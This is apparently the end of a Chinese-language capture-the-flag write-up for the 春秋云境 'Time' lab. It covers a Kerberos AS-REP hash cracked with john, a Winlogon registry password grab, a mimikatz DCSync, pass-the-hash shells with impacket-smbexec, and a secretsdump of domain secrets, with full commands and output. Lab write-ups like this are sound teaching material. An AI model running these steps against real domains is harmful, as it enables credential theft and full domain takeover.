echo '$krb5asrep$23$zhangxin@XIAORANG.LAB:3ff52ceb3c117bcf7e39e29a56ee4a20$c7b6c7c1155f5774978a46d50a9ca3fd44642effcac658f6323a7d39c26d559cf21ed5e37208df2af683362508c089e875a76cfad067181583a8404e1cecaac2c2d924e6075ad70b575389a93804df8edae1ec662712da703d594ed16dcc338f90b53b93d6c194816ceb29c1ed7bf88987e0804899bdd205f439ecec51e248418715eaa6af4e730f617e07d2ec4dd54f1774742ec8014add78bee555b46cadb45670ca29f6c94771005443b383b170840e79718b025cc78110e6907748a92309c1d03ce8e79dab15e62f0a8e06f293c39fa2731cd04f7a5ce6ecc299c1df587dcb5b37fcca5e42bc675b74e7' > zhangxin_hash.txt
1
2
3
4
5
6
7
8
9
10
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt zhangxin_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
strawberry       ($krb5asrep$23$zhangxin@XIAORANG.LAB)     
1g 0:00:00:00 DONE (2026-02-21 02:18) 50.00g/s 51200p/s 51200c/s 51200C/s 123456..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

得到用户凭据

1
zhangxin:strawberry
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# proxychains4 nxc smb 172.22.6.25 -u "zhangxin" -p "strawberry"                                 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.25:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.25:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.25:135  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.25:135  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.25:135 <--socket error or timeout!
SMB         172.22.6.25     445    NONE             [*]  (name:) (domain:) (signing:False) (SMBv1:None)
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.25:445  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.25:445  ...  OK
SMB         172.22.6.25     445    NONE             [+] \zhangxin:strawberry

rdp到172.22.6.25上,这里我用的是remmina,需要设置共享文件夹传文件

先把一些必要的工具传了

用sharphound枚举一下域信息。

之前进入用户目录时除了zhangxin还有一个用户yuxuan,而他是在这个机器上有sessions的。

那可以直接抓取sessions获取他的密码

1
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

而且yuxuan也是可以rdp的。

1
yuxuan:Yuxuan7QbrgZ3L

因为yuxuan对管理员有hassidhistory权限

SIDHistory是一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,会在新域创建一个新的SID作为该对象的objectSid,在之前域中的SID会添加到该对象的sIDHistory属性中,此时该对象将保留在原来域的SID对应的访问权限

直接mimikatz就可以抓到域管理员的哈希

发起同步:由于攻击者已经获取了具备高权限的 yuxuan 账户上下文,便直接运行 mimikatz,执行 lsadump::dcsync /domain:xiaorang.lab /all /csv 命令 

1
lsadump::dcsync /domain:xiaorang.lab /all /csv
1
500     Administrator   04d93ffd6f5f6e4490e0de23f240a5e9        512

之后用pth哈希传递就能为所欲为了。

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# proxychains4 impacket-smbexec -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.25
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.25:445  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
C:\Windows\system32>dir C:\Users\Administrator\Desktop\
 驱动器 C 中的卷没有标签。
 卷的序列号是 EC84-F897

 C:\Users\Administrator\Desktop 的目录

2022/06/29  09:39    <DIR>          .
2022/06/29  09:39    <DIR>          ..
               0 个文件              0 字节
               2 个目录 30,161,707,008 可用字节

C:\Windows\system32>dir C:\Users\Administrator\
 驱动器 C 中的卷没有标签。
 卷的序列号是 EC84-F897

 C:\Users\Administrator 的目录

2022/06/29  09:48    <DIR>          .
2022/06/29  09:48    <DIR>          ..
2022/06/29  09:23    <DIR>          3D Objects
2022/06/29  09:23    <DIR>          Contacts
2022/06/29  09:39    <DIR>          Desktop
2022/06/29  09:23    <DIR>          Documents
2022/06/29  09:23    <DIR>          Downloads
2022/06/29  09:23    <DIR>          Favorites
2022/06/29  09:48    <DIR>          flag
2022/06/29  09:23    <DIR>          Links
2022/06/29  09:23    <DIR>          Music
2022/06/29  09:23    <DIR>          Pictures
2022/06/29  09:23    <DIR>          Saved Games
2022/06/29  09:23    <DIR>          Searches
2022/06/29  09:23    <DIR>          Videos
               0 个文件              0 字节
              15 个目录 30,161,637,376 可用字节

C:\Windows\system32>dir C:\Users\Administrator\flag
 驱动器 C 中的卷没有标签。
 卷的序列号是 EC84-F897

 C:\Users\Administrator\flag 的目录

2022/06/29  09:48    <DIR>          .
2022/06/29  09:48    <DIR>          ..
2026/02/21  13:48               247 flag03.txt
               1 个文件            247 字节
               2 个目录 30,161,641,472 可用字节

C:\Windows\system32>type C:\Users\Administrator\flag\flag03.txt
flag03: flag{07a8328c-77cc-493c-99bb-a9e196896596}


Maybe you can find something interesting on this server. 
=======================================
What you may not know is that many objects in this domain 
are moved from other domains.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# proxychains4 impacket-smbexec -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.12           
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.12:445  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>type C:\Users\Administrator\flag\flag04.txt
Awesome! you got the final flag.

::::::::::::::::::::::::::    :::: :::::::::: 
    :+:        :+:    +:+:+: :+:+:+:+:        
    +:+        +:+    +:+ +:+:+ +:++:+        
    +#+        +#+    +#+  +:+  +#++#++:++#   
    +#+        +#+    +#+       +#++#+        
    #+#        #+#    #+#       #+##+#        
    ###    ##############       ############# 


flag04: flag{fe2e10f6-4231-452f-b161-94bbc6e09346}

C:\Windows\system32>

以示尊敬,用dcsync把哈希全导出来。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# proxychains4 impacket-secretsdump -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.12
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.12:445  ...  OK
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xb6c72cc35247110bf9a762d27573eeb3
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e79cb112a76ed42041a867329dd05358:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
XIAORANG\DC-PROGAME$:aes256-cts-hmac-sha1-96:b84607963095e77deac5c6ad54ce2c3c009b3e32b773ecea107eb1b7d8d1d488
XIAORANG\DC-PROGAME$:aes128-cts-hmac-sha1-96:86540f2832928e267b94d73420920d70
XIAORANG\DC-PROGAME$:des-cbc-md5:e95d1354897058a2
XIAORANG\DC-PROGAME$:plain_password_hex:7e4510a237b3337ad5d09f4f94a6df324535ce75ddfa4173f4cb942bb709f7e0d560a8ce2db3d0bfb0d906e6c5c88175caf7d67fa78419bc10345d9617583dd33328af9794581525f114f9e54e4d1a62c3ea841113e89ccad8e14a168e198a3348493e757d79eaef6c9e0a05f35470675482870e220b0e2e4e7d0be91019c0fc4118d40d84aacaea7596a69104b42afde749b659ddba8e434ec33f3e4dad975f4dcae2f29be11f27c69d4e67f1e72d08ebf19f47ea7efd46fbcd23d78ce569085f436700ad31bbb0cfb5f06a08aad5be25d259617f080cb1ae0fe1ffd63531c83c0bc8023e9fa8bb48fad26062625587
XIAORANG\DC-PROGAME$:aad3b435b51404eeaad3b435b51404ee:f90e97d802109a9df1a3424830910f93:::
[*] DefaultPassword 
(Unknown User):Aliyun1A
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x97319c606768c5c13050642c0a18141e1fb1a5df
dpapi_userkey:0x3a5d3f84ac15de697d328a4c374f9af8e70a1fad
[*] NL$KM 
 0000   DD 30 A5 1D D0 5F 2C 30  BC 75 5D 68 00 F3 A5 76   .0..._,0.u]h...v
 0010   24 B3 19 64 0D F9 4C 84  8A 40 85 7E 7E B0 1C 0B   $..d..L..@.~~...
 0020   E4 B8 F2 C7 F5 40 9B 55  C5 90 DD EA 86 7F 14 29   .....@.U.......)
 0030   2A 21 88 DA 82 DF 6A B9  C5 9F 48 71 11 71 5C 5B   *!....j...Hq.q\[
NL$KM:dd30a51dd05f2c30bc755d6800f3a57624b319640df94c848a40857e7eb01c0be4b8f2c7f5409b55c590ddea867f14292a2188da82df6ab9c59f487111715c5b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.12:135  ...  OK
[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.6.12:49667  ...  OK
[-] ERROR_DS_NAME_ERROR_NOT_UNIQUE: Name translation: Input name mapped to more than one output name.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

还有个密码,不过懒得看是谁的了(大概是wenshao)的。

#春秋云境
春秋云境-Time
http://example.com/2026/02/21/春秋云境-Time/
Author
Skyarrow
Posted on
February 21, 2026
Licensed under